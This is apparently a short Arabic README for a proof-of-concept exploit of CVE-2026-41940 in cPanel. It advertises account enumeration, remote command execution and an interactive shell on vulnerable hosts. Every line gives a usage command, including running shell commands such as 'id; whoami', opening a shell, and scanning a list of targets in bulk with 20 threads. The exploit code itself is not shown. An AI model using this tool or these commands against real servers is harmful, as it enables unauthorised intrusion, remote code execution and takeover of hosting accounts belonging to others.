
إثبات مفهوم لاستغلال CVE-2026-41940 يستهدف cPanel، مما يتيح تعداد الحسابات، وتنفيذ الأوامر، والوصول إلى قشرة تفاعلية على المضيفات المعرضة للخطر.
python3 poc_CVE-2026-41940.py -h
فحص مضيف واحد
python3 poc_CVE-2026-41940.py -u https://target.example:2086
سرد الحسابات بعد سلسلة ناجحة
python3 poc_CVE-2026-41940.py -u https://target.example:2086 --action list
تنفيذ أمر شل
python3 poc_CVE-2026-41940.py -u https://target.example:2086 --action cmd --cmd 'id; whoami; uname -a'
شل تفاعلي
python3 poc_CVE-2026-41940.py -u https://target.example:2086 --action shell
أهداف من ملف + تقرير JSON
python3 poc_CVE-2026-41940.py -l targets.txt -t 20 -o results.json
المرجع : ynsmroztas